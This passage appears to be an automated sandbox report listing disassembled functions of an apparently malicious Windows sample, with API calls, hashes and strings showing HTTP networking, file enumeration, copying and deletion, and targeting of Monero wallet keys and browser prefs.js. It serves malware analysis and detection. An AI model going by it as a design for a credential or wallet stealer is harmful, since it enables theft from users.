Opcode Fuzzy Hash: 614b34faa2c9d78b59e6774d3ea078cb0aa6d1928352823af7e4e256073ce883
Instruction Fuzzy Hash: 0F6113B2900219ABCB24EBA4DC45FEA777CBF88701F048698F60996141EF75EB45CF91

Function 00974880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974839
Part of subcall function 009747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974849

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00974915
StrCmpCA.SHLWAPI(?,0084EAD8), ref: 0097493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00974ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00990DDB,00000000,?,?,00000000,?,",00000000,?,0084EA38), ref: 00974DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00974E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00974E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00974E49
InternetCloseHandle.WININET(00000000), ref: 00974EAD
InternetCloseHandle.WININET(00000000), ref: 00974EC5
HttpOpenRequestA.WININET(00000000,0084EA08,?,0084DFC0,00000000,00000000,00400100,00000000), ref: 00974B15

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

InternetCloseHandle.WININET(00000000), ref: 00974ECF

Strings

------, xrefs: 00974B28
", xrefs: 00974D33
", xrefs: 00974BF2
------, xrefs: 00974C69
------, xrefs: 009749BD

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 06f320300a8c81287dcb8829857e2e95d94c08dc1b26528bd10b7b566e2fae23
Instruction ID: 132ecb6202966d2ce36433f4ebcea869b63084aa4f8a8bf253fb6355c5c2047d
Opcode Fuzzy Hash: 06f320300a8c81287dcb8829857e2e95d94c08dc1b26528bd10b7b566e2fae23
Instruction Fuzzy Hash: BF12AD71910118AAEB15FB50DC92FEEB379AF94300F50419AF106A3591EF782F49CF66

Function 00983EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00983EC3
FindFirstFileA.KERNEL32(?,?), ref: 00983EDA
StrCmpCA.SHLWAPI(?,00990FAC), ref: 00983F08
StrCmpCA.SHLWAPI(?,00990FB0), ref: 00983F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0098406C
FindClose.KERNEL32(000000FF), ref: 00984081

Strings

%s\%s, xrefs: 00983EB7

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 9191b8486e04ee2c5c3b22224177fb31dfe9503ebe0446c5e6b798ab0cbaad86
Instruction ID: ed60d8db724c2feccbe056c72fd56caa8ae75eafeea86f4c13fbaf87dad4aa9a
Opcode Fuzzy Hash: 9191b8486e04ee2c5c3b22224177fb31dfe9503ebe0446c5e6b798ab0cbaad86
Instruction Fuzzy Hash: B85129B2900218ABCB24FB74DC45FEA737CBB84700F444699B65997140EF75AB858F51

Function 0097F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009915B8,00990D96), ref: 0097F71E
StrCmpCA.SHLWAPI(?,009915BC), ref: 0097F76F
StrCmpCA.SHLWAPI(?,009915C0), ref: 0097F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0097FAB1
FindClose.KERNEL32(000000FF), ref: 0097FAC3

Strings

prefs.js, xrefs: 0097F812

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: a6ba1c5e44b3632e1fcb040ff8bc68b695019478e335ceb32a41e2aecd0c7377
Instruction ID: 39e2ea60a26c5b8669f88f9218aa8fe7b4492ff847c326d99b2a06fbe8e49731
Opcode Fuzzy Hash: a6ba1c5e44b3632e1fcb040ff8bc68b695019478e335ceb32a41e2aecd0c7377
Instruction Fuzzy Hash: 9CB113729001189BDB24FF64DC96FED7379AFD4300F4085A9E40A97251EF356B49CBA2

Function 009716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0099510C,?,?,?,009951B4,?,?,00000000,?,00000000), ref: 00971923
StrCmpCA.SHLWAPI(?,0099525C), ref: 00971973
StrCmpCA.SHLWAPI(?,00995304), ref: 00971989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00971D40
DeleteFileA.KERNEL32(00000000), ref: 00971DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00971E20
FindClose.KERNEL32(000000FF), ref: 00971E32

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Strings

\*.*, xrefs: 009717F1

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f8b4a675472fea1ee402dae127b571764292410d74deec87d16b0da18d29b781
Instruction ID: 3640395e332623abaa6dc397a4fcc488b0e4137e26b1ccf7875b83957ac81a84
Opcode Fuzzy Hash: f8b4a675472fea1ee402dae127b571764292410d74deec87d16b0da18d29b781
Instruction Fuzzy Hash: 8912F9719101189BEB19FB60DC96FEE7378AF94300F4045DAB50AA6191EF386F49CFA1

Function 0097DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009914B0,00990C2A), ref: 0097DAEB
StrCmpCA.SHLWAPI(?,009914B4), ref: 0097DB33
StrCmpCA.SHLWAPI(?,009914B8), ref: 0097DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0097DDCC
FindClose.KERNEL32(000000FF), ref: 0097DDDE

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 42d1ff7087cca844d14e6d26b392c0ae5b7c38b52c1ee2833311a79353e11438
Instruction ID: 95bfaee9b3d3119b3f554931fa97255a1875cee189404c37fa17a4b3fac9b926
Opcode Fuzzy Hash: 42d1ff7087cca844d14e6d26b392c0ae5b7c38b52c1ee2833311a79353e11438
Instruction Fuzzy Hash: 44912472D001049BDB14FB74DC96EED737DAFC4300F408659F91A96291EE38AB49CBA2

Function 00987B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

GetKeyboardLayoutList.USER32(00000000,00000000,009905AF), ref: 00987BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00987BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00987C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00987C62
LocalFree.KERNEL32(00000000), ref: 00987D22

Strings

/ , xrefs: 00987C7F

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 4428e22393fe2a8bda7b954ea2c52a3ad6a4a1d558e352f8709de4fbbdc958dd
Instruction ID: e1a9702829d1c849099397dba27545a0906840bd33737ca4329d83d2b24aa51c
Opcode Fuzzy Hash: 4428e22393fe2a8bda7b954ea2c52a3ad6a4a1d558e352f8709de4fbbdc958dd
Instruction Fuzzy Hash: 24413F71941118ABDB24EB94DC99BEDB378FF84700F2041D9E40963291DB786F85CFA1

Function 0097E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00990D73), ref: 0097E4A2
StrCmpCA.SHLWAPI(?,009914F8), ref: 0097E4F2
StrCmpCA.SHLWAPI(?,009914FC), ref: 0097E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0097EBDF

Strings

\*.*, xrefs: 0097E44D

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
